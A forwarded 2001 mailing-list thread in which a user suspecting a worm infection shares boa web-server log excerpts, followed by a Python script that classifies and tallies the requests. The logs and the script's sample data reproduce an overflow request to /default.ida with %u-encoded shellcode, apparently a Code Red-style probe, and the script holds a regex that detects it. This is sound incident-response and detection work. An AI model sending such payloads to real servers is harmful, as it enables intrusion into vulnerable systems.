
Fwd: Re: please read: very odd network traffic




----------  Forwarded Message  ----------

there's more though. but again i'm not sure.. for the first time i've seen a
few odd requests being logged in boa, just a small snippet:


[07/Aug/2001:06:26:03 +0000] request from 195.38.105.70 "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
 ("/var/www/default.ida"): document open: No such file or directory
 [07/Aug/2001:07:13:08 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:07:43:15 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:07:59:05 +0000] malformed request:
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b
%u53ff%u0078%u0000%u00=a HTTP/1.1"
[07/Aug/2001:08:17:28 +0000] request from 195.38.44.138 "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
 ("/var/www/default.ida"): document open: No such file or directory
 [07/Aug/2001:08:31:51 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:08:57:30 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:08:55 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:13:38 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:20:26 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:29:23 +0000] bogus HTTP version: " HTTP/1.0"

this all seems rather coincidental.. and seems to confirm my idea of being
infected with a virus/worm.. hope this helps (me, heh.. :)

On Tuesday 07 August 2001 18:40, William Leese wrote:
> I think my machine has been compromised though i'm not entirely sure.
>
> I suddenly saw a reasonable amount of traffic when I wasn't doing anything
> that could generate it so I turned off all the net connection using
> applications and still there was traffic.
>
> Opened top to see if there was a process that wasn't terminated yet, nope..
> that wasn't it.
>
> Turned off networking.
>
> Tried netstat -ap and found to my great dismay that inetd had started the
> ftp service or at least that port was available. I accidentally installed
> wu-ftp a while ago but i thought i had removed it.. oh well. So, commented
> it out and restarted inetd.
>
> no luck.. the moment i started the networking script there was traffic.
>
> Turned off networking. But not before using Ethereal to capture a few
> packets.
>
> I've added an attachment with the log, could someone take a look at it and
> tell me what could be causing this.. it would seem like something (a worm
> or virus) is scanning the network looking for (vulnerable?) computers.

-------------------------------------------------------
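Added example, not code from the mail or from boa: a small Python parser for boa error-log lines of the shape shown above. It classifies each entry (the /default.ida padding-plus-%u probe, the "bogus HTTP version" entries, everything else) and tallies the probes by the address boa records in "request from", which is the remote client that sent the request. The sample lines are constructed from the excerpt with the X padding shortened; 10.0.0.5 is a made-up address for the non-probe entry.

```python
import re
from collections import Counter

# Constructed sample lines modelled on the boa error-log excerpt in the mail.
# The X padding is shortened; real probes carry a few hundred bytes of it.
SAMPLE_LOG = "\n".join([
    '[07/Aug/2001:06:26:03 +0000] request from 195.38.105.70 "GET /default.ida?'
    'XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3'
    '%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" ("/var/www/default.ida"):'
    ' document open: No such file or directory',
    '[07/Aug/2001:07:13:08 +0000] bogus HTTP version: " HTTP/1.0"',
    '[07/Aug/2001:07:59:05 +0000] malformed request: "XXXXXXXXXXXXXXXXXXXX'
    '%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.1"',
    '[07/Aug/2001:08:17:28 +0000] request from 195.38.44.138 "GET /default.ida?'
    'XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0"'
    ' ("/var/www/default.ida"): document open: No such file or directory',
    '[07/Aug/2001:08:20:00 +0000] request from 10.0.0.5 "GET /index.html HTTP/1.0"'
    ' ("/var/www/index.html"): document open: No such file or directory',
])

TS = r"\[(?P<ts>[^\]]+)\]"
REQUEST_RE = re.compile(TS + r' request from (?P<ip>[\d.]+) "(?P<req>[^"]*)"')
MALFORMED_RE = re.compile(TS + r' malformed request: "(?P<req>[^"]*)"')
BOGUS_RE = re.compile(TS + r' bogus HTTP version: "(?P<ver>[^"]*)"')
# The probe shape seen in the log: a long run of X padding followed by a
# chain of %uXXXX-encoded 16-bit values, normally aimed at /default.ida.
IDA_PROBE_RE = re.compile(r"X{8,}(%u[0-9a-fA-F]{4}){3,}")

def classify(line):
    """Return (kind, source_ip, timestamp) or None; kind is 'ida-probe',
    'bogus-version' or 'other'. source_ip is None when boa logged none."""
    m = REQUEST_RE.match(line) or MALFORMED_RE.match(line)
    if m:
        kind = "ida-probe" if IDA_PROBE_RE.search(m["req"]) else "other"
        return kind, m.groupdict().get("ip"), m["ts"]
    m = BOGUS_RE.match(line)
    if m:
        return "bogus-version", None, m["ts"]
    return None

def summarize(log_text):
    """Count entries per kind and tally which remote addresses sent probes."""
    kinds, probe_sources = Counter(), Counter()
    for line in log_text.splitlines():
        hit = classify(line)
        if hit is None:
            continue
        kind, ip, _ = hit
        kinds[kind] += 1
        if kind == "ida-probe" and ip:
            probe_sources[ip] += 1
    return kinds, probe_sources
```

Run summarize() over the server's real error log to see how many distinct remote addresses are sending the probe; the entries without a source address (malformed request, bogus HTTP version) are counted but cannot be attributed.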